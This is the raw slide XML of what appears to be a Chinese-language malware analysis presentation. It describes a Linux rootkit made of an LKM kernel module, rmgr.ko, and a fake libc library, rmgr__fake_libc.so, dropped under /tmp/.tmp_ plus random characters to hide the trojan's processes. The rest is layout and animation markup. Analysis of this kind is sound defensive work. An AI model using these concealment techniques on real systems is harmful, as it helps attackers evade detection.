            <a:ext cx="6771963" cy="3394751"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2972733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par>
                                <p:cTn id="10" presetID="55"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000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="14"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EB10E04-393F-402A-9CF1-F6BAA31A99EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="475937" y="1371600"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>rootkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>采用常见的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>LKM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内核模块，加载后的主要操作</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{545E8035-19CB-4A14-A298-9D28B527C036}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> 1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rmgr.ko</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAC0365B-87A6-47F5-B0EF-E624877D8CED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1001451" y="2593220"/>
            <a:ext cx="6181725" cy="352425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AB426B4-FB7F-4517-958D-5EA9D60F65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3197" y="142875"/>
            <a:ext cx="6608517" cy="6572250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="69608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1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="1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EB10E04-393F-402A-9CF1-F6BAA31A99EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="475937" y="1371600"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>rootkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>采用常见的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>LKM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内核模块，加载后的主要操作</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{545E8035-19CB-4A14-A298-9D28B527C036}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> 1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rmgr.ko</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{788A7EAB-58F3-466E-A787-E20E79629BD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2603846"/>
            <a:ext cx="9144000" cy="331171"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C92A163C-E103-4444-9DB3-7A89DFCC66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3939" y="247650"/>
            <a:ext cx="5495925" cy="6362700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2186884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1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="1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EB10E04-393F-402A-9CF1-F6BAA31A99EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="475937" y="1371600"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>rootkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>采用常见的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>LKM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内核模块，加载后的主要操作</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{545E8035-19CB-4A14-A298-9D28B527C036}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> 1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rmgr.ko</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{188E1BCC-4C59-4655-A10B-363AD8823963}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1329009" y="2567742"/>
            <a:ext cx="6066255" cy="3368363"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3165832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EB10E04-393F-402A-9CF1-F6BAA31A99EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="475937" y="1371600"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>rootkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>采用常见的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>LKM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内核模块，加载后的主要操作</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{545E8035-19CB-4A14-A298-9D28B527C036}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> 1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rmgr.ko</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4E77D77-5CD7-4306-B893-C00A0B439C67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="800100" y="2697449"/>
            <a:ext cx="3771900" cy="323850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{747817B6-1BB5-49CD-8703-03124BA307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5281" y="1202909"/>
            <a:ext cx="5458619" cy="5485932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{534EFD5F-2903-46FC-AE79-5222E2D332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775" y="3836702"/>
            <a:ext cx="5336655" cy="2414196"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="792330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1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="10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1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="23"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EB10E04-393F-402A-9CF1-F6BAA31A99EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="475937" y="1509194"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>此共享库文件，由内核</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>rootkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>释放写入磁盘，路径为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>_{21</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>个随机字母数字</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，用于木马的用户态进程的行为隐藏</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{545E8035-19CB-4A14-A298-9D28B527C036}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2. rmgr__fake_libc.so</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F621AF4-1510-48E9-A8BB-A1A110583E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3779" y="3019424"/>
            <a:ext cx="3576716" cy="3336405"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="207365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zh-CN" altLang="en-US"/>
              <a:t>内容提纲</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64543" name="Text Box 31"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1660525" y="722313"/>
            <a:ext cx="184150" cy="366712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64554" name="Line 42"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1303338" y="3338513"/>
            <a:ext cx="6167437" cy="7937"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
